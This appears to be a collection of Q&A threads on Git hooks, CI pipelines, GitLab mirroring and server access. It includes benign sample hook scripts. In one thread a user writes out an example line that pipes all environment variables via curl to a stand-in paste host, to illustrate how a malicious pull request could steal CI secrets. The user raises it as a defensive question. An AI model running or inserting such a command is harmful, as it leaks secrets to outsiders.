I ran into a slow SQLAlchemy subquery caused by the Query.select_from() syntax. Based on that experience, I want to get a warning every time certain syntax is used in our codebase. For example, when programmers add the code below, I want to get a warning.
q = session.query(Address).select_from(User).\
    join(User.addresses).\
    filter(User.name == 'ed')
Is there any linter or tool that can do this?
Ideally, you would set up a pre-receive hook on the remote Git repo hosting server, like this one, in order to read the pushed files and grep them for "query.*\.select_from": if the pattern is detected, that hook would reject the push.
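A minimal sketch of such a hook, written in Python purely for illustration (the regex, the .py file filter and the reject message are my own assumptions to adapt):

#!/usr/bin/env python3
# Hypothetical pre-receive hook: reject pushes that introduce .select_from() calls.
import re
import subprocess
import sys

PATTERN = re.compile(r'\.select_from\(')  # crude approximation of the grep above
EMPTY_TREE = '4b825dc642cb6eb9a060e54bf8d69288fbee4904'

def changed_python_files(old, new):
    # Files added or modified between the old and new tip of the pushed ref.
    if set(old) == {'0'}:  # new branch: diff against the empty tree
        old = EMPTY_TREE
    out = subprocess.check_output(
        ['git', 'diff', '--name-only', '--diff-filter=ACM', old, new], text=True)
    return [p for p in out.splitlines() if p.endswith('.py')]

for line in sys.stdin:  # one "<old-sha> <new-sha> <refname>" line per pushed ref
    old, new, ref = line.split()
    if set(new) == {'0'}:  # ref deletion, nothing to check
        continue
    for path in changed_python_files(old, new):
        blob = subprocess.check_output(['git', 'show', '%s:%s' % (new, path)],
                                       text=True, errors='replace')
        if PATTERN.search(blob):
            sys.stderr.write('rejected: %s on %s uses select_from()\n' % (path, ref))
            sys.exit(1)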
If you don't have access to the remote server (for instance on GitHub), you would need to set up a webhook instead.
The alternative is to deploy a pre-push hook to all clients and do the check there, but that could be bypassed, or might simply not get deployed to everybody.
A server-side hook / webhook is safer.
I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in an ordinary file in the repo called pipelines.yml (we use Azure Pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR in which they edit pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?
How can I verify that a malicious PR doesn't change at least some critical files?
I'm afraid there is no built-in way to prevent a PR from changing certain critical files.
As a workaround, you could turn off automatic fork builds and instead use pull request comments as a way to manually trigger builds for these contributions, which gives you an opportunity to review the code before triggering a build.
You could check the document "Consider manually triggering fork builds" for more details.
For one of our repositories we set "Custom CI configuration path" inside GitLab to a remote gitlab-ci.yml. We want to do this to prevent developers from changing the gitlab-ci.yml file (as protected files are only available in EE Premium and up). Apart from that purpose, the Custom CI configuration path feature should still work for Merge Requests.
Being in repo
group1/repo1
we set
.gitlab-ci.yml#group1/repo1-ci
The repo1-ci repository exists and CI works correctly when we push to the configured branches etc.
For Merge Request functionality GitLab tells us:
Detached merge request pipeline #123 failed for ...
Project group1/repo1-ci not found or access denied!
We added the developers to the repo1-ci repo with the Developer role so they can read the files. It does not help. In any case, our expectation was that the pipeline is not run with user permissions, so it should simply find the gitlab-ci.yml file.
Any ideas on this?
So our expectations were right, and it seems that we have to take one important thing into account:
If a user interacts with the Merge Request features in the GitLab UI and you are using "Custom CI configuration path" for your gitlab-ci.yml file, please ensure that:
this user has at least read permission on that remote file, even if you moved it to another repo on purpose (e.g. use enhanced file protection in PREMIUM/ULTIMATE or push/merge-protect the branches against the Developer role)
the user's session has actually picked up this permission change
The last part is what failed for our users, as it only worked one day later. It seems they just continued working from their open merge request page, and GitLab checks accessibility based on that session (using a cookie, token or something similar that was not updated with the new access to the remote repo/file).
It works!
I'm trying to push a Laravel installation from development to a live environment on a Laravel Forge server. When pushing, I'm getting an error that I'm not getting in my local environment.
I can't figure out how to connect directly to the provisioned server (through FTP or SFTP) to change single files manually (to debug).
This means that in order to try something, I need to make a new commit and an entirely new deployment for every single thing I want to test. Quite tedious, and it clutters my git history!
... I can't even do a commit --amend, since that gives me the error:
fatal: refusing to merge unrelated histories
Attempt 1) I can't find anything about it in the Forge knowledge base.
Attempt 2) I've found several articles pointing to a good guide, but that guide returns a 404 error:
It's this one: https://freek.dev/2016/03/let-your-clients-use-sftp-on-a-forge-provisioned-server/
Am I missing something obvious? Or is the commit-n-push really the way to go? Is this normal for automated deployment systems?
For others who find this question: Forge support got back to me really quickly and linked to this blog post explaining how to get SFTP access to a Forge-provisioned server.
What I did wrong was that I didn't use the username forge (I was using my email).
Say I've got an upstream repo (origin) that was added with
git remote add origin file:////upstream.host/repo.git
The repo.git is actually a Windows shared folder where I and my dev colleagues have r/w access.
Now, I want to set up a post-receive hook on upstream.host that notifies Trac about freshly pushed revisions for automatic ticket updating. Basically, this is done by calling an executable on upstream.host that does some work in the database there.
However, I noticed that the hook for some reason doesn't work.
So I set up the hook to print everything it's doing to D:/temp/post-receive.log and issued a git push in order to trigger the hook.
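Something like this minimal sketch (Python here purely for illustration; the log path is the one mentioned above):

#!/usr/bin/env python3
# Diagnostic post-receive hook: record where the hook actually runs.
import os
import socket
import sys

with open('D:/temp/post-receive.log', 'a') as log:
    log.write('host: %s\n' % socket.gethostname())
    log.write('cwd:  %s\n' % os.getcwd())
    log.write('refs: %s\n' % sys.stdin.read())  # "<old> <new> <refname>" lines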
When I looked into D:/temp on upstream.host, there was no logfile created.
Then another question of mine came to mind: https://superuser.com/questions/974337/when-i-run-a-git-hook-in-a-repo-on-a-network-share-which-binaries-are-used.
If the binaries of my machine are used to execute the hook, maybe the paths of my machine are used as well. I looked into D:/temp on my own machine and voilà, there was the post-receive.log.
I logged the pwd to the logfile and it is not D:/repos/repo.git (what I expected) but actually //upstream.host/repo.git. Obviously the whole hook is executed in the context of the pusher's machine and not in the context of the repo machine (upstream.host).
This is no problem for me, since I have admin access to the remote machine and could use administrative shares to get my hook going (i.e. \\upstream.host\D$\repos\repo.git etc.). But it is an issue for my colleagues, since they are plain users without admin rights.
How do I set up my post-receive hook properly so that it works as expected?
How do I force my hook to be entirely run on the remote machine without using anything from my machine?
Do I really have to implement a real server hosting my repo? Or are there other ways that don't need a server?
A post-receive hook is run, after receiving data, on the machine that is hosting the repository.
Now, the machine that is "hosting the repository" is not the file server where the actual packed-refs and other git database files are stored (this file server could be anything from a redundant cloud-based storage appliance to any old NAS-enabled "network disk").
Instead, it is the machine that runs the "git frontend", that is, the git commands that actually interact with that database.
Now you are using a "network share" to host your (remote) git repository. For your computer (the client), this is just another disk device (like your floppy), and the git on your client will happily store database files there and run any hooks. But all of this happens on your computer, which is being told to handle the "remote" locally, simply because the file:// protocol does mean "local".
By the way, the fact that your remote points at upstream.host is meaningless: a remote's name is only there for you to keep track of multiple remotes, and it could just as well be called thursday.next.
So there is no way to run any script on the file server that merely happens to store some files named packed-refs and the like.
If you want to have a git server to run hooks for you, you must have a git server first. Even worse: if you want a git server on machineX to run scripts on machineX, you must install a git server on machineX first.
The good news: there is no need to "implement a real server". Just install a pre-existing one. You will find documentation about that in the Git Book, but for starters it's basically enough to have git (for interacting with the database) and sshd (for secure communication over the network, and for invoking git when appropriate) installed on upstream.host.
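Once that is in place, a post-receive hook dropped into the bare repository's hooks/ directory will run on upstream.host itself. A minimal sketch (Python purely for illustration; notify_trac.exe and its path stand in for whatever executable actually updates the Trac database):

#!/usr/bin/env python3
# Hypothetical post-receive hook running on upstream.host itself.
# notify_trac.exe is a placeholder for the executable mentioned in the question.
import subprocess
import sys

for line in sys.stdin:  # one "<old> <new> <refname>" line per pushed ref
    old, new, ref = line.split()
    subprocess.run(['D:/tools/notify_trac.exe', old, new, ref], check=True)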
Finally: I'm actually quite glad that you need to have software (e.g. a server) running on the remote end to execute code there. Just imagine what it would mean if copying some HTML files to your USB disk could suddenly spawn a web server out of thin air. Not to mention Win32 viruses breeding happily on my Linux NAS...
My Google-fu is failing me for what seems obvious if I can only find the right manual.
I have a GitLab server which was installed by our hosting provider.
The GitLab server has many projects.
For some of these projects, I want GitLab to automatically push to a remote repository (in this case GitHub) every time there is a push from a local client to GitLab.
Like this: client --> gitlab --> github
Any tags and branches should also be pushed.
AFAICT I have 3 options:
1. Configure the local client with two remotes and push simultaneously to GitLab and GitHub. I want to avoid this because developers.
2. Add a git post-receive hook in the repository on the GitLab server. This would be the most flexible option (I have enough Linux experience to write shell scripts as git hooks) and I have found documentation on how to do it, but I want to avoid it too, because the hosting provider would then need to give me shell access.
3. Use webhooks in GitLab. I am unfamiliar with even the basics of webhooks, and I am unable to locate understandable documentation or even a simple step-by-step example. This is the documentation from GitLab that I found, and I do not understand it: http://demo.gitlab.com/help/web_hooks/web_hooks
I would appreciate good pointers, and I will summarize and document a solution when I find it.
EDIT
I'm using this Ruby code for a web hook:
require 'sinatra/base'
require 'json'

class PewPewPew < Sinatra::Base
  post '/pew' do
    push = JSON.parse(request.body.read)
    puts "I got some JSON: #{push.inspect}"
  end
end
Next: find out how to tell the GitLab server that it has to push a repository. I am going back to the GitLab API.
EDIT
I think I have an idea. On the server where I run the webhook, I pull from GitLab and then push to GitHub. I can even do some "magic" (running tests, building jars, deploying to Artifactory, ...) before I push to GitHub. In fact, it would be great if Jenkins were able to push to a remote repository after a successful build; then I wouldn't need to write my own webhook, because I'm pretty sure Jenkins already provides a webhook for GitLab, either natively or via a plugin. But I don't know. Yet.
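The pull-then-push part could be as small as this sketch (Python only to illustrate the idea; both URLs, the mirror path and the credential handling are placeholders I made up):

#!/usr/bin/env python3
# Hypothetical mirror step run by the webhook receiver: fetch everything from
# GitLab into a local mirror clone, then push all refs to GitHub.
import subprocess

MIRROR = '/var/lib/mirrors/myproject.git'  # created once with: git clone --mirror <gitlab-url> <path>
GITHUB = 'git@github.com:example/myproject.git'

subprocess.run(['git', '--git-dir', MIRROR, 'fetch', '--prune', 'origin'], check=True)
subprocess.run(['git', '--git-dir', MIRROR, 'push', '--mirror', GITHUB], check=True)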
EDIT
I solved it in Jenkins.
You can set more than one git remote in a Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
Your first option (two remotes on each client) would work, of course.
Your second option (a post-receive hook on the GitLab server) is possible but dangerous, because GitLab Shell automatically symlinks hooks into repositories for you, and those are necessary for permission checks: https://github.com/gitlabhq/gitlab-shell/tree/823aba63e444afa2f45477819770fec3cb5f0159/hooks so I'd rather stay away from it.
Web hooks (your third option) are not suitable directly: they make an HTTP request in a fixed format on certain events, in your case push; they are not Git protocol requests.
Of course, you could write a server that consumes the hook, clones and pushes, but a service (single push and no extra deployment) or GitLab CI (which already implements hook management) would be strictly better solutions.
Services would be the best option if someone implemented one: they live in the source tree, would do a single push, and require no extra deployment overhead.
GitLab CI or other CIs like Jenkins are the best option currently available. They are essentially an already-implemented server for the webhooks, which automatically clones for you: all you have to do then is push from there.
The keywords you want to Google for are "gitlab mirror github". That led me to GitLab repository mirroring, for instance. There seems to be no perfect, easy solution today.
Also, this has already been proposed at the feature request forum: http://feedback.gitlab.com/forums/176466-general/suggestions/4614663-automatic-push-to-remote-mirror-repo-after-push-to (always check there ;) and go upvote the request).
The key difficulty now is how to store the push credentials.
I solved it in Jenkins. You can set more than one git remote in a Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
I added "-publisher" jobs that run after "" is built successfully. I could have done it in one job, but I decided to split it up. The build jobs are triggered by a web hook in GitLab; the publisher jobs are using a #daily schedule from the BuildResultTrigger plugin.